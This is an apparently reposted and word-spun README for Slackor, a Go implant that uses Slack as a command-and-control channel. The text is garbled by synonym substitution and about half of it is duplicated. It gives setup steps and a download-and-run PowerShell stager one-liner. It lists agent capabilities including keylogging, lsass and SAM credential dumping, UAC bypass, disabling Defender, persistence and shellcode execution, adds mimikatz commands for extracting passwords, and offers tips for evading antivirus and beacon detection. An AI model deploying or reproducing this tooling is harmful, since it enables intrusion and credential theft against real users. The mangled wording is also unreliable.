Slackor - A Golang Implant That Uses Slack Equally A Command In Addition To Command Server
A Golang implant that uses Slack every bit a command as well as command channel.
This projection was inspired past times Gcat as well as Twittor.
This tool is released every bit a proof of concept. Be certain to read as well as empathise the Slack App Developer Policy earlier creating whatever Slack apps.
Setup
Note: The server is written inwards Python 3
For this to piece of occupation you lot need:
After starting server.py on a Linux host, execute
Run the "stager" module to generate a one-liner as well as other droppers.
Usage
Type "help" or press [TAB] to come across a listing of available commands. type "help [COMMAND]" to come across a description of that command.
OPSEC Considerations
Command output as well as downloaded files are AES encrypted inwards add-on to TLS carry encryption.
Modules volition warn you lot earlier performing tasks that write to disk.
When executing musical rhythm commands, guide keep authorities annotation that cmd.exe volition move executed. This may move monitored on the host. Here are several OPSEC security commands that volition NOT execute cmd.exe:
Credits
Future goals
FAQ:
Is this security to exercise for ruby-red teams/pentesting?
Yes, given about conditions. While the information is encrypted inwards transit, the agent contains the cardinal for decryption. Anyone who acquires a re-create of the agent could reverse engineer it as well as extract the API keys as well as the AES hush-hush key. Anyone who compromises or otherwise gains access to the workspace would move able to recall all information inside it. For this reason, it is non recommended to re-use infrastructure against multiple organizations.
What virtually Mimikatz?
The implant does non guide keep in-memory password dumping functionality. If you lot demand logonPasswords, you lot tin endeavor the following:
Not yet. It has non been fully tested on a multifariousness of systems. The server was designed to run on Kali Linux as well as the agent on Windows 10.
How good does it scale?
Scalability is express past times the Slack API. If you lot guide keep multiple agents, visit increasing the beacon interval of beacons non inwards use.
Is it vulnerable to measure beacon analysis?
Currently each beacon has 20% jitter built in, as well as beacon times tin move customized. Agent check-in asking as well as reply packets volition move virtually the same size each fourth dimension every bit long every bit no novel commands are recieved.
Why did you lot practise [x] when a amend agency to practise it is [y]?
I tried my best. PRs are encouraged :)
It gets caught past times AV!
The built-in HTA stager is created past times SpookFlare which is based on Demiguise. If you lot desire your droppers to non larn snagged you lot likely desire to larn custom. The built inwards droppers are simply at that spot to larn you lot started.
This projection was inspired past times Gcat as well as Twittor.
This tool is released every bit a proof of concept. Be certain to read as well as empathise the Slack App Developer Policy earlier creating whatever Slack apps.
Setup
Note: The server is written inwards Python 3
For this to piece of occupation you lot need:
- Influenza A virus subtype H5N1 Slack Workspace
- Register an app amongst the next permissions:
- channels:read
- channels:history
- channels:write
- files:write:user
- files:read
- Create a bot
install.shInstalls dependanciessetup.pyThe script to practise the slack channels, database, as well as implantserver.pyThe Slackor server, designed to move ran on Linuxtemplate.goTemplate for the generated implantrequirements.txtPython dependencies (installed automatically)
- Run
install.sh - Run
setup.py- Supply the OAuth Access Token as well as Bot User OAuth Access Token from your app
agent.exe volition move created. It volition move a 64bit Go binary packed amongst UPX.After starting server.py on a Linux host, execute
agent.exe on your target Windows host.Run the "stager" module to generate a one-liner as well as other droppers.
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exeUsage
Type "help" or press [TAB] to come across a listing of available commands. type "help [COMMAND]" to come across a description of that command.
(Slackor)- Help - Displays assist menu
- interact - Interact amongst an agent
- list - List all registered agents
- remove - kill as well as take away an agent
- revive - Sends a dot to all agents to re-register amongst the server
- stager - Generates a one-liner to download an execute the implant
- quit - Quit the program
- wipefiles - Deletes all uploaded files out of Slack
(Slackor:AGENT)- back - Return to the top dog menu
- beacon - alter the total of fourth dimension betwixt each check-in past times an agent (default is 5 seconds)
- bypassuac - Attempts to spawn a high integrity agent
- cleanup - Removes persistence artifacts
- clipboard - Retreives the contents of the clipboard
- defanger - Attempts to de-fang Windows Defender
- download - Download a file from the agent to the Slackor server
- duplicate - Causes the agent to spawn about other invocation of itself
- getsystem - Spawns an agent every bit NTAUTHORITY/SYSTEM
- help - Displays assist menu
- keyscan - Starts a keylogger on the agent
- kill - Kill the agent
- minidump - Dumps retention from lsass.exe as well as downloads it
- persist - Creates persistence past times implanting a binary inwards an ADS
- samdump - Attempts to dump the SAM file for offline hash extraction
- screenshot - Takes a screenshot of the desktop as well as retrieves it
- shellcode - Executes x64 raw shellcode
- sleep - Cause the agent to slumber ane time (enter fourth dimension inwards seconds)
- sysinfo - Displays the electrical current user, OS version, scheme architecture, as well as publish of CPU cores
- upload - Upload a file to the agent from the Slackor server
- wget - Pull downward arbitrary files over HTTP/HTTPS
OPSEC Considerations
Command output as well as downloaded files are AES encrypted inwards add-on to TLS carry encryption.
Modules volition warn you lot earlier performing tasks that write to disk.
When executing musical rhythm commands, guide keep authorities annotation that cmd.exe volition move executed. This may move monitored on the host. Here are several OPSEC security commands that volition NOT execute cmd.exe:
- cat - prints file content
- cd - alter directory
- hostname - Displays the advert of the host
- ifconfig - Displays interface information
- ls - listing directory contents
- mkdir - Creates a directory
- pwd - prints the electrical current working directory
- rm - removes a file
- rmdir - removes a directory
- whoami / getuid - prints the electrical current user
Credits
- https://github.com/EgeBalci - Functions adapted from HERCULES as well as EGESPLOIT
- https://github.com/SaturnsVoid - Keylogger adapted from GoBot2
- https://github.com/vyrus001 - x64 shellcode execution shellGo
- Crypto functions adopted from https://www.golang123.com/topic/1686
- Persistence stance from Enigma0x3
- Minidump adoped from Merlin, credit to C-Sto
- Screenshot code from kbinani
- Clipboard code from atotto
- Stager generator from hlldz
- UAC bypass past times winscripting.blog
- Lulzbin detect past times @vector_sec
- Countless threads on StackOverflow
- Thanks to impacket for dumping hashes from SAM/SYS/SECURITY reg hives.
- LSASS dump credential extraction made possbile using pypykatz past times skelsec
Future goals
- DOSfuscation
- Reflectively charge DLL/PE - https://github.com/vyrus001/go-mimikatz
- Execute C# assemblies inwards retention - https://github.com/lesnuages/go-execute-assembly
- Source code obfuscation https://github.com/unixpickle/gobfuscate
FAQ:
Is this security to exercise for ruby-red teams/pentesting?
Yes, given about conditions. While the information is encrypted inwards transit, the agent contains the cardinal for decryption. Anyone who acquires a re-create of the agent could reverse engineer it as well as extract the API keys as well as the AES hush-hush key. Anyone who compromises or otherwise gains access to the workspace would move able to recall all information inside it. For this reason, it is non recommended to re-use infrastructure against multiple organizations.
What virtually Mimikatz?
The implant does non guide keep in-memory password dumping functionality. If you lot demand logonPasswords, you lot tin endeavor the following:
(Slackor: AGENT)minidump>mimikatz.exe mimikatz # sekurlsa::Minidump lsassdump.dmp mimikatz # sekurlsa::logonPasswordsNot yet. It has non been fully tested on a multifariousness of systems. The server was designed to run on Kali Linux as well as the agent on Windows 10.
How good does it scale?
Scalability is express past times the Slack API. If you lot guide keep multiple agents, visit increasing the beacon interval of beacons non inwards use.
Is it vulnerable to measure beacon analysis?
Currently each beacon has 20% jitter built in, as well as beacon times tin move customized. Agent check-in asking as well as reply packets volition move virtually the same size each fourth dimension every bit long every bit no novel commands are recieved.
Why did you lot practise [x] when a amend agency to practise it is [y]?
I tried my best. PRs are encouraged :)
It gets caught past times AV!
The built-in HTA stager is created past times SpookFlare which is based on Demiguise. If you lot desire your droppers to non larn snagged you lot likely desire to larn custom. The built inwards droppers are simply at that spot to larn you lot started.
